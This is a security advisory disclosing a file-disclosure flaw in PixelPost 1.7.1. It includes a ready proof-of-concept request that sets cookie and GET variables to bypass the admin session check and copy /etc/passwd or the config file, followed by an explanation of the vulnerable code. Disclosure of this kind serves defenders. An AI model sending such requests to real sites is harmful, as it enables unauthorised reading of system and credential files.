SecurityvulnsSECURITYVULNS:DOC:19988PixelPost 1.7.1 File Disclosure
PixelPost 1.7.1 File Disclosure
by Charles "real" F. <charlesfol[at]hotmail.fr>
[http://realn.free.fr]
Requires register_globals = On
magic_quotes_gpc = Off
PROOF OF CONCEPT
****************
TARGET URL: http://[url]/addons/copy_folder.php?
_GETDATA=files[0]=/etc/passwd&cfgrow[password]=p4ssw0rd&cfgrow[timestamp]=0&cfgrow[imagepath]=file.txt%00
POSTDATA=copyfolder=ok&folder_path=ok
COOKDATA=_SESSION[pixelpost_admin]=p4ssw0rd
Note: You can get a FPD, just loading http://[url]/addons/copy_folder.php.
This would be useful to get config file, which is located here:
./includes/pixelpost.php
EXPLANATIONS
************
First of all, we have to bypass this line:
C# 32. if(!isset($_SESSION["pixelpost_admin"])
C# . || $cfgrow['password'] != $_SESSION["pixelpost_admin"]
C# . || $_GET["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"]
C# . || $_POST["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"])
C# . die ("Try another day!!");
The author tries to prevent $_SESSION overwrite, but forgets that COOKIES are
"registered" too.
To bypass this, we have to set a cookie: _SESSION[pixelpost_admin]=p4ssw0rd
and a GET var: cfgrow[password]=p4ssw0rd
We got ADMIN ACCESS.
C# 52. if($addon_handle = opendir($folder))
C# 53. {
C# 54. while (false !== ($file = readdir($addon_handle)))
C# 55. {
C# 56. if($file != "." && $file != "…" && $file != ".DS_Store")
C# 57. {
C# 58. $files[]=$file;
C# 59. $files_withdate[$counter]['filename'] = $file;
C# 60. $exifdate = copy_folder_get_exif_date($folder.$file);
C# 61. $files_withdate[$counter]['date'] = $exifdate;
C# 62. $counter++;
C# 63. } // end file !"."
C# 64. } // end while
C# 65. closedir($addon_handle);
C# 66. } // if addon_handle done
$folder var can't be defined: it's '/'.
But $files[] array is not initialized, so we can select which file we wanna
see.
Finally, line 102, we got our final and useful function:
C# 102. if(copy($file,$newpath))